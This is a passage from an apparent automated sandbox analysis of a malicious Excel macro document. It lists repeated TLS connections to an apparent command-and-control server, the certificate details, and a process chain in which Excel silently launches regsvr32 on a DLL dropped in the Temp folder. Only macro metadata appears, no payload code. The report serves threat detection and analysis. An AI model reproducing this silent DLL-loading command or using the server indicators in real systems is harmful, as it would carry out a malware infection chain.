Jan 12, 2021 07:43:57.870600939 CET	77.220.64.37	443	192.168.2.22	49210	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:59.946667910 CET	77.220.64.37	443	192.168.2.22	49214	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:01.972985983 CET	77.220.64.37	443	192.168.2.22	49218	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:04.051670074 CET	77.220.64.37	443	192.168.2.22	49222	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:06.128902912 CET	77.220.64.37	443	192.168.2.22	49226	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:08.250636101 CET	77.220.64.37	443	192.168.2.22	49232	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:11.343770981 CET	77.220.64.37	443	192.168.2.22	49236	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:13.389673948 CET	77.220.64.37	443	192.168.2.22	49240	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:15.452431917 CET	77.220.64.37	443	192.168.2.22	49244	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:17.511456013 CET	77.220.64.37	443	192.168.2.22	49248	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:19.586059093 CET	77.220.64.37	443	192.168.2.22	49252	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:21.677202940 CET	77.220.64.37	443	192.168.2.22	49256	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:23.748641968 CET	77.220.64.37	443	192.168.2.22	49260	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:25.826719046 CET	77.220.64.37	443	192.168.2.22	49264	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:28.880371094 CET	77.220.64.37	443	192.168.2.22	49268	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:30.961344957 CET	77.220.64.37	443	192.168.2.22	49272	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:33.033416033 CET	77.220.64.37	443	192.168.2.22	49276	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:35.080435991 CET	77.220.64.37	443	192.168.2.22	49280	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:37.133029938 CET	77.220.64.37	443	192.168.2.22	49284	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:39.227730989 CET	77.220.64.37	443	192.168.2.22	49288	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:41.335612059 CET	77.220.64.37	443	192.168.2.22	49292	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:43.409327030 CET	77.220.64.37	443	192.168.2.22	49296	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:45.532656908 CET	77.220.64.37	443	192.168.2.22	49300	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:47.638113976 CET	77.220.64.37	443	192.168.2.22	49304	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:49.744573116 CET	77.220.64.37	443	192.168.2.22	49308	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:51.831463099 CET	77.220.64.37	443	192.168.2.22	49312	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:53.924520969 CET	77.220.64.37	443	192.168.2.22	49316	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:56.032154083 CET	77.220.64.37	443	192.168.2.22	49320	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:44:58.167417049 CET	77.220.64.37	443	192.168.2.22	49324	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:00.228245020 CET	77.220.64.37	443	192.168.2.22	49328	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:02.282641888 CET	77.220.64.37	443	192.168.2.22	49332	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:04.378952026 CET	77.220.64.37	443	192.168.2.22	49336	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:06.525912046 CET	77.220.64.37	443	192.168.2.22	49340	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:08.641508102 CET	77.220.64.37	443	192.168.2.22	49344	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:10.758306026 CET	77.220.64.37	443	192.168.2.22	49348	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:12.865268946 CET	77.220.64.37	443	192.168.2.22	49352	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:14.940088987 CET	77.220.64.37	443	192.168.2.22	49356	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:17.049262047 CET	77.220.64.37	443	192.168.2.22	49360	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:19.138649940 CET	77.220.64.37	443	192.168.2.22	49364	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:21.244668961 CET	77.220.64.37	443	192.168.2.22	49368	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:23.379292965 CET	77.220.64.37	443	192.168.2.22	49372	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:25.655993938 CET	77.220.64.37	443	192.168.2.22	49376	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:27.717139959 CET	77.220.64.37	443	192.168.2.22	49380	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:30.254415989 CET	77.220.64.37	443	192.168.2.22	49384	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:32.367144108 CET	77.220.64.37	443	192.168.2.22	49388	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:34.489134073 CET	77.220.64.37	443	192.168.2.22	49392	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:36.308809996 CET	77.220.64.37	443	192.168.2.22	49396	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:38.451756001 CET	77.220.64.37	443	192.168.2.22	49400	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:40.549096107 CET	77.220.64.37	443	192.168.2.22	49404	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:45:42.692789078 CET	77.220.64.37	443	192.168.2.22	49408	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2288 Parent PID: 584

General

Start time:	07:42:41
Start date:	12/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fd70000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2548 Parent PID: 2288

General

Start time:	07:42:49
Start date:	12/01/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Imagebase:	0xff510000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2540 Parent PID: 2548

General

Start time:	07:42:49
Start date:	12/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Imagebase:	0x210000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DW20.EXE PID: 2460 Parent PID: 2288

General

Start time:	07:43:07
Start date:	12/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456
Imagebase:	0x13f4d0000
File size:	995024 bytes
MD5 hash:	45A078B2967E0797360A2D4434C41DB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DWWIN.EXE PID: 2304 Parent PID: 2460

General

Start time:	07:43:08
Start date:	12/01/2021
Path:	C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dwwin.exe -x -s 2456
Imagebase:	0xff3f0000
File size:	152576 bytes
MD5 hash:	25247E3C4E7A7A73BAEEA6C0008952B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Executed Functions

Function pagesREviewsd, APIs: 16, Strings: 7, Number of lines: 22, Relevance: 56.022

APIs	Meta Information
Cells
SpecialCells
xlCellTypeConstants
value
Chr
Row
Split
Split
Cells
